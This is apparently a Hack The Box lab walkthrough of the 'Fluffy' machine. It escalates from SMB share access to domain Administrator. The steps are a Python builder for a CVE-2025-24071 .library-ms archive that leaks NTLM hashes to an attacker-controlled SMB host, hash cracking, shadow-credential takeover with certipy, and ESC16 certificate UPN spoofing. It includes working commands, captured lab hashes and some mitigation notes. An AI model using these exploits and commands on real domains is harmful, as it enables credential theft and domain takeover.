Fluffy is an easy-difficulty machine from Hack The Box. It starts with an exposed, writable SMB share that holds a PDF referencing CVE-2025-24071; by abusing that bug we capture the NetNTLMv2 handshake of the user p.agila and crack it. p.agila is a member of Service Account Managers, which has GenericAll over the Service Accounts group, so we add ourselves to that group and obtain write access over the service accounts. Shadow credentials on winrm_svc give the user flag. The same technique on ca_svc, combined with ESC16 (the CA issues certificates without the SID security extension), lets us set ca_svc's UPN to administrator, request a certificate with certipy, restore the UPN and authenticate as Administrator to retrieve its NT hash.
The initial nmap scan:

```
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-28 01:45:39Z)
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
|_ssl-date: 2025-05-28T01:47:40+00:00; +7h00m00s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-28T01:47:38+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-28T01:47:40+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
|_ssl-date: 2025-05-28T01:47:38+00:00; +7h00m00s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 139/tcp)
HOP RTT       ADDRESS
1   657.54 ms 10.10.16.1
2   983.89 ms 10.10.11.69

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 216.14 seconds
```
The Kerberos port (88) together with LDAP/LDAPS and the global catalog ports tells us the machine is a Windows Active Directory Domain Controller, and the LDAP banner gives us the domain fluffy.htb and the host name DC01. So let's add fluffy.htb and dc01.fluffy.htb to our /etc/hosts file. Note also the +7h00m clock skew that ssl-date reports: Kerberos only tolerates a few minutes of skew by default, so sync your clock against the DC (for example with ntpdate, or wrap the tool in faketime) before any Kerberos-based step such as certipy, or you will get KRB_AP_ERR_SKEW errors.
Exposed SMB share - ESC16 abuse
We are given user credentials (j.fleischman / J0elTHEM4n1990!), so we use them to authenticate to SMB and enumerate the shares. We have READ and WRITE permissions on the IT share, and listing it turns up a few interesting files:
```
┌──(kali㉿kali)-[~]
└─$ smbclient \\\\10.10.11.69\\IT -U j.fleischman%'J0elTHEM4n1990!'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue May 27 21:50:17 2025
  ..                                  D        0  Tue May 27 21:50:17 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 11:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 11:04:05 2025
  KeePass-2.58                        D        0  Fri Apr 18 11:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 11:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 10:31:07 2025

                5842943 blocks of size 4096. 1684645 blocks available
smb: \> get *
NT_STATUS_OBJECT_NAME_INVALID opening remote file \*
smb: \> get KeePass-2.58.zip
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: \> get Upgrade_Notice.pdf
```

smbclient's `get` takes a single file name, which is why `get *` fails with NT_STATUS_OBJECT_NAME_INVALID; `mget *` is the command for several files. The file that matters here is Upgrade_Notice.pdf.
The PDF lists recent CVEs the environment is exposed to. One of them is [CVE-2025-24071](https://nvd.nist.gov/vuln/detail/CVE-2025-24071): exposure of sensitive information to an unauthorized actor in Windows File Explorer, allowing an attacker to perform spoofing over a network. In practice, when a user extracts an archive that contains a crafted .library-ms file, Explorer parses the library description and reaches out to the UNC path inside it, which leaks the user's NetNTLMv2 response to whoever runs that SMB server. Since we can write to the IT share, we place such an archive there and run an SMB listener on our attacking host.
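How the triggering archive is built, as an added example that is not part of the original writeup: a .library-ms file is a small XML document, and the `simpleLocation/url` inside it is the UNC path Explorer opens. The attacker address 10.10.16.5, the share name `share` and the member file name are assumptions; the XML skeleton follows the public proof-of-concept layout for this CVE. The last function is the defender-side check, scanning an archive for .library-ms members that point at a UNC path.

```python
"""Build and inspect a CVE-2025-24071 trigger archive (added example)."""
import io
import zipfile
import xml.etree.ElementTree as ET

LIBRARY_NS = "http://schemas.microsoft.com/windows/2009/library"


def build_library_ms(attacker_ip: str, share: str = "share") -> str:
    """Return the XML body of a .library-ms whose location is \\\\attacker_ip\\share.

    Explorer resolves that UNC path when the file is handled, which is what
    leaks the NetNTLMv2 response to the attacker's SMB listener.
    """
    unc = f"\\\\{attacker_ip}\\{share}"
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<libraryDescription xmlns="{LIBRARY_NS}">\n'
        '  <name>@windows.storage.dll,-34582</name>\n'
        '  <version>6</version>\n'
        '  <isLibraryPinned>true</isLibraryPinned>\n'
        '  <iconReference>imageres.dll,-1003</iconReference>\n'
        '  <templateInfo>\n'
        '    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>\n'
        '  </templateInfo>\n'
        '  <searchConnectorDescriptionList>\n'
        '    <searchConnectorDescription>\n'
        '      <isDefaultSaveLocation>true</isDefaultSaveLocation>\n'
        '      <isSupported>false</isSupported>\n'
        '      <simpleLocation>\n'
        f'        <url>{unc}</url>\n'
        '      </simpleLocation>\n'
        '    </searchConnectorDescription>\n'
        '  </searchConnectorDescriptionList>\n'
        '</libraryDescription>\n'
    )


def build_zip(attacker_ip: str, member: str = "Upgrade_Notes.library-ms",
              share: str = "share") -> bytes:
    """Pack the .library-ms into a ZIP (member name is an assumed lure name)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member, build_library_ms(attacker_ip, share))
    return buf.getvalue()


def find_unc_targets(zip_bytes: bytes) -> list:
    """Defender-side check: (member, url) for every .library-ms inside an
    archive whose location is a UNC path. Non-empty means the archive would
    make Explorer talk to a remote SMB server."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".library-ms"):
                continue
            root = ET.fromstring(zf.read(name))
            for url in root.iter(f"{{{LIBRARY_NS}}}url"):
                if url.text and url.text.startswith("\\\\"):
                    hits.append((name, url.text))
    return hits


if __name__ == "__main__":
    payload = build_zip("10.10.16.5")          # assumed attacker tun0 address
    with open("Upgrade_Notes.zip", "wb") as fh:
        fh.write(payload)
    print(find_unc_targets(payload))
```

Upload the resulting ZIP to the IT share with smbclient's `put`, start an SMB listener such as Responder on the assumed address, and wait for someone to extract the archive. What comes back is a NetNTLMv2 challenge/response, which is only useful for offline cracking (or relaying while it is live), not for pass-the-hash.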
The listener does capture a NetNTLMv2 response, for the user p.agila. We crack it with john and rockyou:
```
┌──(kali㉿kali)-[~/CVE-2025-24071]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
prometheusx-303  (p.agila)
1g 0:00:00:01 DONE (2025-05-27 15:10) 0.8771g/s 3963Kp/s 3963Kc/s 3963KC/s proquis..programmercomputer
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
```
We can use these credentials (or j.fleischman's) to collect BloodHound data and check what p.agila can do. BloodHound shows that p.agila is a member of Service Account Managers, which has GenericAll over the Service Accounts group, and that Service Accounts in turn has GenericWrite over the service accounts winrm_svc and ca_svc.

With GenericAll over the group we simply add p.agila to Service Accounts (for instance with bloodyAD's add groupMember or net rpc group addmem), which gives us GenericWrite over winrm_svc and ca_svc. GenericWrite is enough to write msDS-KeyCredentialLink, so we take over winrm_svc with shadow credentials. certipy's shadow auto adds a key credential, authenticates with the matching certificate via PKINIT, retrieves the NT hash and restores the old attribute value:
```
┌──(kali㉿kali)-[~/CVE-2025-24071]
└─$ certipy-ad shadow auto -dc-ip '10.10.11.69' -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -target 'dc01.fluffy.htb' -account winrm_svc
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '41b73771-9d63-53e9-3145-56e150cce6a7'
[*] Adding Key Credential with device ID '41b73771-9d63-53e9-3145-56e150cce6a7' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '41b73771-9d63-53e9-3145-56e150cce6a7' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
```
The winrm_svc hash can be passed to WinRM (evil-winrm with -H) to land on the box and read the user flag. Note that although certipy restores the original msDS-KeyCredentialLink afterwards, the write itself is still an audited directory change on the DC, so this is not invisible.

For root we take over ca_svc, the CA service account, the same way and claim its hash:

```
└─$ certipy-ad shadow auto -dc-ip '10.10.11.69' -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -target 'dc01.fluffy.htb' -account ca_svc
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '7203dfb1-1b0d-2033-9e2e-29d873aa865d'
[*] Adding Key Credential with device ID '7203dfb1-1b0d-2033-9e2e-29d873aa865d' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '7203dfb1-1b0d-2033-9e2e-29d873aa865d' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
```

The CA on this box is vulnerable to ESC16: the szOID_NTDS_CA_SECURITY_EXT extension (OID 1.3.6.1.4.1.311.25.2), which normally embeds the requester's SID in every issued certificate, is disabled on the CA. Certificates it issues therefore carry no SID, and the DC falls back to mapping them to an account by the UPN in the subject alternative name alone. Since we have GenericWrite over ca_svc, we use certipy's account update command to set its userPrincipalName to administrator. The "Failed to resolve" line only means certipy could not resolve the domain name through DNS; with -dc-ip supplied the update still goes through, as the last line shows:

```
[!] Failed to resolve: FLUFFY.HTB
[*] Updating user 'ca_svc':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_svc'
```

Now, authenticating as ca_svc with its hash, we request a certificate from any template that permits client authentication; the built-in User template works fine. The certificate comes back with the UPN administrator and, as expected for ESC16, no object SID:

```
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 19
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
```

Before using the certificate we put ca_svc's UPN back, otherwise the UPN administrator in the certificate would still resolve to ca_svc rather than to the real Administrator account (and the account is left as we found it):

```
[!] Failed to resolve: FLUFFY.HTB
[*] Updating user 'ca_svc':
    userPrincipalName                   : ca_svc
[*] Successfully updated 'ca_svc'
```
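Why the UPN swap works, as an added example that is not part of the original writeup and not Windows or certipy code: a toy model of how a DC maps a client certificate to an account. With the SID security extension present, the DC checks that the SID in the certificate matches the account it resolved from the UPN; when the CA leaves the extension out (ESC16), the mapping rests on the UPN alone. The accounts, SIDs and the simplified UPN lookup below are constructed to mirror the box and are assumptions, not values taken from it.

```python
"""Toy certificate-to-account mapping, to illustrate ESC16 (added example)."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# szOID_NTDS_CA_SECURITY_EXT: the extension that carries the requester's SID
SID_EXT_OID = "1.3.6.1.4.1.311.25.2"


@dataclass
class Account:
    sam: str
    sid: str
    upn: Optional[str] = None


@dataclass
class Certificate:
    upn: str                                   # UPN otherName in the SAN
    extensions: Dict[str, str] = field(default_factory=dict)


class Directory:
    """Minimal stand-in for AD: accounts keyed by sAMAccountName."""

    def __init__(self, accounts: List[Account]):
        self.accounts = {a.sam.lower(): a for a in accounts}

    def resolve_upn(self, upn: str) -> Optional[Account]:
        # Simplified KDC lookup (assumption): exact userPrincipalName match
        # first, then the part before '@' as sAMAccountName, since the
        # built-in Administrator often has no UPN set at all.
        for a in self.accounts.values():
            if a.upn and a.upn.lower() == upn.lower():
                return a
        return self.accounts.get(upn.split("@")[0].lower())

    def set_upn(self, sam: str, upn: str) -> None:
        self.accounts[sam.lower()].upn = upn


class CertificateAuthority:
    """Issues a cert whose SAN UPN is copied from the requester's AD object.
    sid_extension_enabled=False models an ESC16 CA."""

    def __init__(self, directory: Directory, sid_extension_enabled: bool):
        self.directory = directory
        self.sid_extension_enabled = sid_extension_enabled

    def issue(self, requester_sam: str) -> Certificate:
        acct = self.directory.accounts[requester_sam.lower()]
        cert = Certificate(upn=acct.upn or f"{acct.sam}@fluffy.htb")
        if self.sid_extension_enabled:
            cert.extensions[SID_EXT_OID] = acct.sid
        return cert


def map_certificate(directory: Directory, cert: Certificate) -> Optional[str]:
    """DC-side mapping: the sAMAccountName the cert authenticates as, or None
    when the certificate must be rejected."""
    acct = directory.resolve_upn(cert.upn)
    if acct is None:
        return None
    sid = cert.extensions.get(SID_EXT_OID)
    if sid is not None and sid != acct.sid:
        return None        # strong mapping: SID in cert disagrees with account
    return acct.sam


def esc16_attack(sid_extension_enabled: bool, restore_upn: bool = True) -> Optional[str]:
    """Replay the writeup's steps against the toy directory."""
    d = Directory([
        Account("Administrator", "S-1-5-21-1111-2222-3333-500"),          # constructed SIDs
        Account("ca_svc", "S-1-5-21-1111-2222-3333-1103", "ca_svc@fluffy.htb"),
    ])
    ca = CertificateAuthority(d, sid_extension_enabled)
    d.set_upn("ca_svc", "administrator")          # certipy account update ... -upn administrator
    cert = ca.issue("ca_svc")                     # certipy req as ca_svc, template User
    if restore_upn:
        d.set_upn("ca_svc", "ca_svc@fluffy.htb")  # put the UPN back before authenticating
    return map_certificate(d, cert)               # certipy auth -pfx administrator.pfx


if __name__ == "__main__":
    print("ESC16 CA, UPN restored   :", esc16_attack(False))              # Administrator
    print("ESC16 CA, UPN not restored:", esc16_attack(False, restore_upn=False))  # ca_svc
    print("SID extension enabled    :", esc16_attack(True))               # None (rejected)
```

The three runs in `__main__` are the three outcomes a practitioner should expect: with the extension disabled and the UPN restored the certificate maps to Administrator; without restoring the UPN it still maps to ca_svc, which is why the writeup reverts the UPN before running certipy auth; with the extension enabled the SID embedded at issuance (ca_svc's) disagrees with Administrator's and the mapping is rejected. On a real DC the SID check is the strong certificate mapping from KB5014754, and in its Full Enforcement mode a certificate with no SID extension is refused outright instead of being mapped by UPN; the fix on the CA side is to re-enable the security extension.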
With the certificate we can now authenticate as Administrator; certipy gets a TGT via PKINIT and also retrieves the account's NT hash:
```
└─$ certipy-ad auth -dc-ip '10.10.11.69' -pfx administrator.pfx -domain fluffy.htb -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
```
With the Administrator NT hash we can log in over WinRM or SMB (pass-the-hash with evil-winrm or psexec) and read the root flag; the user flag was already reachable with the winrm_svc hash obtained through the shadow-credentials step.